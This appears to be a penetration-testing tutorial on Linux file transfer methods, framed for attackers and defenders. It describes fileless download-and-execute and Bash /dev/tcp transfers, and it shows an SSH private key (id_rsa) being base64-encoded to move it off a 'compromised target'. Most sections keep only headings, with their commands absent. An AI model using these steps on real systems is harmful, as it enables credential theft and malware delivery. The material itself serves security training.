π§Linux File Transfer Methods
Introduction
Linux is a versatile operating system, which commonly has many different tools we can use to perform file transfers. Understanding file transfer methods in Linux can help attackers and defenders improve their skills to attack networks and prevent sophisticated attacks.
A few years ago, we were contacted to perform incident response on some web servers. We found multiple threat actors in six out of the nine web servers we investigated. The threat actor found a SQL Injection vulnerability. They used a Bash script that, when executed, attempted to download another piece of malware that connected to the threat actor's command and control server.
The Bash script they used tried three download methods to get the other piece of malware that connected to the command and control server. Its first attempt was to use cURL. If that failed, it attempted to use wget, and if that failed, it used Python. All three methods use HTTP to communicate.
Although Linux can communicate via FTP, SMB like Windows, most malware on all different operating systems uses HTTP and HTTPS for communication.
Download Operations
Base64 Encoding / Decoding
Depending on the file size we want to transfer, we can use a method that does not require network communication. If we have access to a terminal, we can encode a file to a base64 string, copy its content into the terminal and perform the reverse operation.
Check File MD5 Hash:
md5sum id_rsa
# Output: 4e301756a07ded0a2dd6953abf015278 id_rsaEncode SSH Key to Base64:
cat id_rsa | base64 -w 0; echo
# Output: LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0K...Decode the File:
Confirm the MD5 Hashes Match:
β οΈ Note: You can also upload files using the reverse operation. From your compromised target cat and base64 encode a file and decode it on your attack machine.
Web Downloads with Wget and cURL
Two of the most common utilities in Linux distributions to interact with web applications are wget and curl. These tools are installed on many Linux distributions.
Download a File Using wget:
Download a File Using cURL:
Common wget Options:
-O- Set output filename-q- Quiet mode (suppress output)-c- Continue partial downloads-r- Recursive download--user-agent- Set custom user agent
Common cURL Options:
-o- Write output to file-O- Write output to file (use remote filename)-s- Silent mode-L- Follow redirects-k- Allow insecure SSL connections
Fileless Attacks Using Linux
Because of the way Linux works and how pipes operate, most of the tools we use in Linux can be used to replicate fileless operations, which means that we don't have to download a file to execute it.
β οΈ Note: Some payloads such as mkfifo write files to disk. Keep in mind that while the execution of the payload may be fileless when you use a pipe, depending on the payload chosen it may create temporary files on the OS.
Fileless Download with cURL:
Fileless Download with wget:
Download and Execute Python Script:
Download and Execute Bash Script:
Download with Bash (/dev/tcp)
There may also be situations where none of the well-known file transfer tools are available. As long as Bash version 2.04 or greater is installed (compiled with --enable-net-redirections), the built-in /dev/TCP device file can be used for simple file downloads.
Connect to the Target Webserver:
HTTP GET Request:
Print the Response:
Complete Example:
SSH Downloads
SSH (or Secure Shell) is a protocol that allows secure access to remote computers. SSH implementation comes with an SCP utility for remote file transfer that, by default, uses the SSH protocol.
Setup SSH Server (if needed):
Download Files Using SCP:
Download Directory Using SCP:
Using SSH Key Authentication:
Alternative Download Methods
Python Downloads
Perl Downloads
Ruby Downloads
Upload Operations
Web Upload
We can use uploadserver, an extended module of the Python HTTP.Server module, which includes a file upload page. Let's configure the uploadserver module to use HTTPS for secure communication.
Install uploadserver:
Create a Self-Signed Certificate:
Start Web Server:
Upload Multiple Files:
Upload Single File:
Alternative Web File Transfer Method
Since Linux distributions usually have Python or PHP installed, starting a web server to transfer files is straightforward.
Create Web Server with Python3:
Create Web Server with Python2.7:
Create Web Server with PHP:
Create Web Server with Ruby:
Download File from Target Machine:
SCP Upload
We may find some companies that allow the SSH protocol (TCP/22) for outbound connections, and if that's the case, we can use an SSH server with the scp utility to upload files.
Upload File using SCP:
Upload Directory using SCP:
Upload with SSH Key:
SFTP (SSH File Transfer Protocol)
SFTP provides a secure way to transfer files and can be used interactively or in batch mode.
Interactive SFTP Session:
Batch SFTP Operations:
Netcat File Transfer
Netcat can be used for simple file transfers when other methods are not available.
Setup Netcat Listener (Receiving End):
Send File via Netcat:
Transfer with Progress (using pv):
Rsync File Transfer
Rsync is a powerful tool for synchronizing files and directories locally or over a network.
Basic Rsync Usage:
Rsync over SSH:
Rsync with Progress:
Common Rsync Options:
-a- Archive mode (preserves permissions, timestamps, etc.)-v- Verbose output-z- Compress data during transfer-r- Recursive--delete- Delete files not present in source--exclude- Exclude patterns
Advanced Techniques
Using Socat for File Transfer
Socat is a more advanced version of netcat with additional features.
Setup Socat Listener:
Send File via Socat:
FTP File Transfer
When FTP is available and allowed through firewalls.
Interactive FTP Session:
Automated FTP with Script:
Using Git for File Transfer
Git can be used as an unconventional file transfer method when available.
Clone Repository:
Create and Push Files:
Security Considerations
Encrypted File Transfer
Always prefer encrypted methods when possible:
HTTPS over HTTP:
SCP/SFTP over FTP:
SSH Tunneling:
File Integrity Verification
Always verify file integrity after transfer:
MD5 Checksums:
SHA256 Checksums:
Compare Checksums:
Key Takeaways
Multiple methods available - Linux provides many built-in tools for file transfer
Fileless operations - Many tools support direct execution from memory
Base64 encoding - Useful for small files and restricted environments
HTTP/HTTPS preferred - Most commonly allowed through firewalls
SSH/SCP - Secure and widely supported for encrypted transfers
Netcat versatility - Simple but powerful for basic transfers
Always verify integrity - Use checksums to ensure successful transfers
Consider security - Prefer encrypted methods when possible
References
Last updated